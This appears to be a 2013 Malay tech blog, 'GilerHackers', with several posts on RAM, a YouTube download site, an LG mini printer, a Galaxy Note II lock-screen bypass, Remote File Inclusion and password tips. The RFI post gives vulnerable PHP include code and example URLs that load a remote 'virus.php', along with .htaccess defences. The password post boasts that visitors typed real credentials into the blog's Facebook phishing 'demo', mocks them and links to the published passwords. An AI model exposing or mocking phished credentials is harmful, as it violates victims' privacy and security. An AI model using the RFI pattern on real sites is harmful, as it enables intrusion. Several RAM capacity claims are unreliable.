Perkara yang paling penting -- data-data komen anda selamat selama-lamanya. Disebabkan oleh Disqus menggunakan pangkalan datanya tersendiri, seandainya laman tersebut ditamatkan perkhidmatan atau anda beralih kepada sistem yang lain, ke semua data-data komen ini boleh dikembalikan dan dipaparkan semula.

Kredit

Kenali RAM (Random Access Memory)


Assalamualaiikum dan selamat sejahtera.Kami dari GilerHackers memohon maaf kerana tiada artikel dikemas kini dalam 2-3 hari kebelakangan ini.kerana agak kesibukan masa. entri kali ini 100% dicopy paste dari blog   shahteamberkk.blogspot.com selamat membaca. ^_^

Secara ringkasnya RAM adalah Perantaraan antara Processor dan Hard Disk.Dimana Fungsi RAM Mengumpul Data yang di Proses oleh CPU sebelum di hantar atau disimpan ke dalam Hard Disk.Sebab itu la RAM yang menpunyai jumlah memory simpanan data yang besar cthnya 2gb dapat mengelakkan Windows menjadi berat,apabila kita menjalankan banyak program pada Windows dalam satu masa pada Komputer.

Jenis-jenis RAM
RAM menpunyai 6 jenis iaitu SDRAM,DDR1 RAM,DDR2 RAM, DDR3 RAM,DDR4 RAM dan yang terkini DDR5 RAM


SDRAM ialah RAM yang paling lama.Selalunya SDRAM jenis ini untuk Motherboard zaman Pentium 3
RAM jenis ini sudah tidak berada di pasaran masa kini.Jumlah tertinggi memory SDRAM ini ialah 256mb


RAM DDR 1 ini adalah RAM untuk motherboard intel Pentium 4,AMD ataupun untuk motherboard tahun 2002 ke bawah.Memory tertinggi RAM jenis ini adalah 512mb.RAM jenis ini juga susah untuk dijumpai di pasaran skrg kalau ada pun yang terpakai.


RAM DDR 2 adalah RAM untuk Motherboard tahun 2004 keatas seperti motherboad intel dual core,Amd Sempron,Athlon ataupun seangkatan dgnnya.RAM jenis murah harga kerana byk di pasaran skrg.Memory paling tinggi RAM ini ialan 2gb


RAM jenis DDR 3 adalah RAM keluaran baru untuk menyokong Keluaran Motherboad terbaru masa kini.Memory tertinggi RAM jenis ini adalah 4gb.Harganya mahal sedikit berbanding RAM DDR 2

Pengeluar RAM yang paling popular ialan KINGSTON.Setiap RAM akan diupdate untuk menyokong Motherboard yang terbaru.Setiap RAM yang terbaru menpunyai kelebihan seperti Current,jumlah Memory yang besar

Ini adalah cth RAM yang Popular di pasaran sekrg.Ada lagi RAM keluaran terbaru seperti RAM DDR 4 dan DDR 5

Cara Download Video Youtube Tanpa Software

Assalamualaiikum dan selamat sejahtera.
Artikel kali ini kami kognsikan 1 tips paling mudah untuk muat turun (download) video dari youtube tanpa memerlukan software.Sangat mudah digunakan dan sangat ringkas ^_^

Pertama, anda hanya perlu ke laman web http://en.savefrom.net/ dan masukan url Link Video yang ingin di download.contoh seperti gambar dibawah.


Tunggu beberapa saat, selepas keputusan diproses, sila rujuk kotak bewarna merah, pilih jenis fail yang anda ingin dan klick sahaja pada link berkenaan. Selesai tutorial Download Video dari youtube tanpa Software.

Selain youtube, boleh juga guna untuk download fail dari rapidshare.com

kalau malas boleh paste sahaja link youtube dibawah. :p
Masukan Url Video dibawah dan klick Download

Jika artikel ini bermanfaat, sila klick button share dibawah.selamat mencuba.

Pencetak Mini Untuk Telefon Pintar


LG Electronics (LG) memperkenalkan satu peranti terbaru dalam memudahkan penggunanya mencetak gambar secara terus selepas diambil melalui telefon pintar atau tablet.
PD233 adalah pencetak poket mini yang memberikan kualiti cetakan gambar terbaik dan pantas. Hanya perlu menyambungkan telefon pintar dengan pencetak melalui sambungan WiFi.

Pencetak poket mini ini boleh digunakan untuk pengguna telefon pintar Android dan iOS. Pencetak yang kecil ini sangat menarik dan mempunyai bentuk luaran yang stylish.

Ia menjadi pencetak terkecil dan paling ringan dengan hanya berat 215 gram dan ukuran sekitar 72 x 120 x 24 mm, membolehkan senang membawanya ke mana saja termasuk meletakkan di dalam poket baju atau dalam beg tangan.

Tidak hairanlah jika LG menyasarkan untuk golongan yang sentiasa sibuk atau kepada mereka yang melancong. Ia boleh dijadikan sebagai poskad kenangan sewaktu melancong.

Hasil cetakan dari pencetak ini akan berukuran 5.1 x 7.6 cm, saiz yang sangat praktikal untuk dikongsi atau dijadikan kenangan.
Pengguna hanya perlu muat turun aplikasi pencetak ini dan seterusnya hanya perlu menyambungkan telefon pintar dengan pencetak poket mini dan boleh terus mencetak dengan pantas.

Sumber

Bypass Samsung Galaxy Note II LOCK SCREEN Vulnerability


Assalamualaiikum dan selamat sejahtera.Jika anda seorang pengguna iOS,Mungkin anda pernah mendengar tentang kelemahan keselamatan iPhone yang ditemui baru-baru ini. Boleh rujuk disini [+]Link

Kali ini ia adalah Android yang di buzz hari ini. Khususnya, ia phablet kreatif Samsung Galaxy Note II. Seorang Youtuber bernama Terence Eden baru-baru ini telah memuat naik satu video di youtube yang menunjukkan kelemahan keselamatan pada Samsung Galaxy Note II.

Kelemahan ini menunjukkan bagaimana pengguna boleh memintas skrin kunci dan mengakses aplikasi atau panggilan dari Home Screen  Android OS. Kelemahan ini telah ditunjukkan pada Note II berjalan pada Android 4.1.2 saham OS. Walaupun, pengguna hanya boleh mengakses skrin untuk satu atau dua kali, tetapi ia adalah satu jangka masa yang cukup untuk membuat panggilan atau membuka mana-mana aplikasi pada skrin jika anda cukup cepat.



* Samsung Galaxy S3 Android 4.1.2 juga dikatakan terdedah pada masalah yang sama.

Hack Dengan Kaedah RFI [Remote File Inclusion ] Bagaimana ia berfungsi?

Assalamualaiikum dan selamat sejahtera.RFI atau Remote file inclusion sekarang menjadi salah satu kaedah yang selalu digunakan penggodam selain kaedah suntikan SQL.Jadi kami di [GH] cuba mencari info bagaimana ia berfungsi.

"Remote file inclusion" atau lebih mesra dikenali sebagai "R.F.I" adalah salah satu serangan terhadap laman web dengan membolehkan pihak penyerang menjalankan skrip atau aturcara mereka tersendiri. Kesannya bergantung kepada jenis skrip yang dimasukkan oleh pihak penyerang.

Sekiranya mereka menjalankan aturcara membuang pangkalan data, maka ke semua laman web anda tidak dapat dijalankan memandangkan pangkalan data anda sudah dibuang.

Akhirnya, anda terpaksa mengembalikan pangkalan data yang telah disalin sebelum ini bagi membolehkan laman web berjalan semula seperti biasa. Sehubungan dengan itu, anda boleh gunakan artikel ini sebagai panduan untuk menyelamatkan laman web dari digondam melalui cara ini seandainya anda menggunakan skrip laman web tersendiri. Jika menggunakan CMS, tidak perlu risau mengenainya.

Cara Serangan RFI
Kaedah serangan RFI ini sebenarnya bergantung kepada cara penulisan skrip anda di laman web yang telah dikesan oleh pihak penyerang.

Untuk melakukan penyerang perlu tahu secara lengkap skrip yang anda jalankan. Berikut adalah antara contoh aturcara laman web anda yang telah membuka ruang kepada penyerang dan semestinya dijalankan pada pelayan yang menggunakan PHP.
include($page . '.php');

Aturcara di atas dituliskan dalam satu fail .php yang bakal memproses maklumat yang dihantar contohnya satu laman web borang, selepas diklik butang "Hantar", semua maklumat yang dimasukkan oleh pengguna akan ditujukan ke laman ini. Katakan nama fail tersebut adalah index.php.

Maka selepas diklik butang "Hantar", alamat URL di pelayar web (web browser) akan bertukar menjadi seperti ini:
http://www.websaya.com/index.php?page=arkib

Di mana, bahagian aturcara di dalam index.php akan ditukarkan kepada pembolehubah yang dinyatakan dalam URL menjadi seperti ini:
include('arkib.php');

dan secara tersendirinya, fail index.php akan memanggil fail arkib.php ke dalamnya dan proses seterusnya dijalankan. Oleh kerana pembolehubah $page dalam index.php tidak dinyatakan nilaian asal (default) maka pengondam akan menggunakan pembolehubah ini untuk memasukkan nilaian dari laman web yang lain. Contohnya:
http://www.websaya.com/index.php?page=http://www.weblain.com/virus.php

dan di bahagian index.php pula, pembolehubah include akan menafsirkan nilaian tersebut menjadi seperti ini:
include('http://www.weblain.com/virus.php.php');

Tetapi oleh kerana pihak pengondam tidak mengetahui secara lengkap apakah jenis sambungan yang anda akan tetapkan, jadi mereka akan meletakkan tanda "?" dibelakang alamat URL bagi membolehkan aturcara dibahagian pelayan melepaskan fail tersebut untuk diproses.

Tanda "?" membawa maksud supaya pihak pelayan (server) menentukan sendiri bentuk fail tersebut. Sekiranya sambungan yang telah ditetapkan adalah .php, maka dengan sendiri fail tersebut dilepaskan.

Sekiranya sambungan dibahagian include ditetapkan kepada .ini berbanding .php seperti include($page . '.ini'); maka "?" akan menjadikan sambungan seterusnya sebagai pembolehubah yang lain. Sebagai contoh:
include($page . '.ini');

dan "URL injection" yang dimasukkan adalah seperti ini:
http://www.websaya.com/index.php?page=http://www.weblain.com/virus.php?

maka, proses yang berlaku di dalam index.php adalah:
include('http://www.weblain.com/virus.php?.ini');

pada asalnya, bagi menjalankan aturcara, pengondam seharusnya menggunakan sambungan fail .ini. Tetapi pihak pembangunan telah meletakkan sambungan .ini berbanding .php. Oleh kerana kehadiran "?", maka dibahagian pelayan (server) tetap menjalankan proses dengan memanggil fail tersebut walaupun sambungan berlainan kerana tanda "?" menjadikan sambungan .ini sebagai satu pembolehubah yang lain.

Dengan ini, fail virus.php tersebut dengan sendirinya akan dimasukkan ke dalam index.php dan dijalankan. Seterusnya akan merosakkan laman web anda mengikut aturcara yang ditulis oleh pihak pengondam.

Kenapa serangan ini boleh dijalankan
register_global dihidupkan. register_global membolehkan PHP mengambil secara pembolehubah yang dinyatakan di dalam URL tanpa melalui proses tapisan sekuriti terlebih dahulu. Oleh sebab itu, kebiasaanya untuk pelayan-pelayan web (server) yang baru, fungsi ini dimatikan secara asalnya.

allow_url_fopen
dihidupkan. Fungsi ini membenarkan PHP untuk memasukkan sebarang maklumat atau membuka ruang untuk kemasukkan fail yang lain dari domain yang asal (kiranya memasukkan fail dari tempat yang lain). Oleh sebab itu, dalam versi PHP 5.2, fungsi ini telah diubahsuai dan diasingkan yang mana untuk fungsi include(), allow_url_include telah diwujudkan dan tetapan ini telah dimatikan secara sendirinya.

Cara mengatasi serangan RFI
Terdapat beberapa cara yang boleh kita lakukan untuk mengatasi dan melindungi laman web dari terkena serangan ini tetapi di sini saya cuma tunjukkan satu cara sahaja iaitu dengan menggunakan .htaccess fail. Sebelum itu, perlu pastikan bahawa pelayan menyokong "mod_rewrite"

Dengan menggunakan arahan di bawah ini, ia akan memeriksa sebarang permintaan yang datang dari URL luaran iaitu http://, https:// dan ftp://
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*)

Seterusnya dengan memasukkan kod di atas di dalam .htaccess dan diikuti dengan beberapa arahan lain seperti:
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*)
RewriteRule ^(.+)$ - [F]

Seandainya anda mempunyai akses terus ke dalam pelayan untuk mengendalikan beberapa modul-modul server, anda boleh gunakan arahan ini:
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp)://(.*)
RewriteRule ^(.+)$ - [env=rfi:true]
</IfModule>
CustomLog /path/to/logs/rfi.log combined env=rfi

Sumber Rujukan

Hosting Percuma Untuk Kegunaan Rakyat Malaysia!


Assalamualaiikum dan selamat sejahtera.Dalam kehidupan kita hari ini, Hosting juga merupakan 1 aset penting, ia boleh dikategorikan sebagai harta kita dialam maya. BETUL ke? hahah.
Ok hari ini [GH] review satu produk yang sangat terbaik ,apa yang penting ia adalah keluaran Malaysia dan lebih menarik ia tersedia didalam bahasa melayu! [GH] sangat menyokong apa sahaja yang dilakukan oleh rakyat malaysia kerana ini juga menunjukan salah satu kemajuan negara kita.

Seperti yang anda tahu, Sekarang banyak laman web yang menyediakan perkhidmatan Hosting Percuma (Free Hosting) begitu juga dengan Hostinger.my.Ok, sekarang abaikan semua hosting percuma yang ada di internet! Mari kami terangkan apa kelebihan hostinger.my berbanding Free Hosting yang lain.

Setelah mencuba perkhidmatan ini, [GH] sangat berpuas hati terhadap paparan laman web yang kemas dan sangat ringan,Tidak seperti Free Hosting yang lain, kadang kadang mempunyai masalah loading yang begitu lama! ini adalah diantara kelebihan yang ada di hostinger.my

selain dari menyediakan ruangan Storan sebesar 2GB,dan 100GB bandwith, ia juga menyokong PHP dan MySQL tanpa memaparkan apa apa iklan pada laman web anda!Jadi apa yang kami fikirkan disini? YA, ia sangat bagus untuk mereka yang baru menceburi bidang membuat laman web,Selain itu, hostinger.my juga mempunyai AUTO INSTALL dengan pelbagai script tersedia seperti:
1- wordpress
2- joomla
3- Mambo
4- buddy press
5- Open blog
6- Open cart
7- Drupal
8- boxbilling dan banyak lagi

Selain mudah dengan penggunaan bahasa melayu, Hostinger.my mempunyai Forum untuk pengguna bertanya masalah dan bertukar tukar pendapat.Jika anda berpuas hati untuk terus mengunakan perkhidmatan hostinger.my mereka juga menyediakan perkhidmatan berbayar dengan pakej premium dan business!

Jadi kenapa anda tidak sahaja mendaftar ke hostinger.my? Ambil peluang ini dan daftar akaun Hosting Percuma anda dengan menekan banner dibawah: "Jangan Lupa untuk ikut perkembangan terbaru kami Di Facebook GilerHackers "
Hosting Percuma

Tips Mencipta Password Yang Selamat Dan Berkualiti

Assalamualaiikum dan selamat sejahtera.Terima kasih kerana sudi mengikuti setiap perkembangan di [GH].
Untuk artikel ini, kami akan berkongsi tips bagaimana untuk anda membuat pemilihan kata laluan (Password) yang selamat dan berkualiti.

Password bertindak sebagai kunci untuk membuka akaun peribadi seperti email,facebook,twitter dan sebagainya.Bagaimana untuk mengelakan ianya dari dicuri atau digodam? Khasnya untuk mereka yang berniat jahat! (black hat hackers)

Tahukah pelbagai cara digunakan penggodam untuk menembus atau menceroboh sesuatu akaun , termasuk cuba meneka kata laluan mangsanya.

"Berdasarkan kajian yang dibuat oleh Computer Crime Research Center, 21% menggunakan nickname mereka sendiri ataupun rakan-rakan, 15% menggunakan tarikh lahir ataupun tarikh ulangtahun mereka dan 15% lagi menggunakan nama binatang peliharaan mereka sebagai password. Kira-kira 14% menggunakan nama keluarga rakan, 7% menggunakan tarikh yang sukar dilupakan bagi mereka, dan 2% lagi menggunakan perkataan “password” sebagai kata laluan mereka."

TIPS UNTUK MEMBINA PASSWORD YANG SELAMAT DAN BERKUALITI
1- Password mestilah tidak kurang dari 8 karakter
2- Masukkan nombor, simbol dan juga huruf.
3- Gunakan huruf besar diselang-selikan dengan huruf kecil.
4- Gunakan password yang berlainan di akaun yang berlainan.
5- Tukar password anda selalu ataupun buat perubahan kecil pada password anda
6- JANGAN buat password yg sama dengan username, ic, no telefon, nama,

Cuba semak artikel lepas bertajuk  "Cara Phising Facebook berfungsi (live demo dengan tutorial Step by Step)" perasan atau tidak, terang terang kami sudah nyatakan dilaman utama . Ini adalah live demo, dan jangan masukan sebarang email dan password yang betul!. tapi apa yang hairan.. ada juga yang masukan email dan password mereka. tapi tidak hairan kerana semua yang menjadi mangsa bukanlah dari malaysia, mungkin mereka tidak faham bahasa Malaysia.. hahahah ^_^ . Lihat Password mereka disini [Link+]  (*jadi kan sebagai contoh sahaja)

Sejauh mana tahap keselamatan kata laluan atau password anda? Jom Uji DISINI atau klick pada banner dibawah.

 

© Copyright 2013 [GH] GilerHackers! All Rights Reserved.
Beo v.3 Themes Design by BukhariMalek | Contact On Facebook Diselenggara Oleh: IdeaKreatif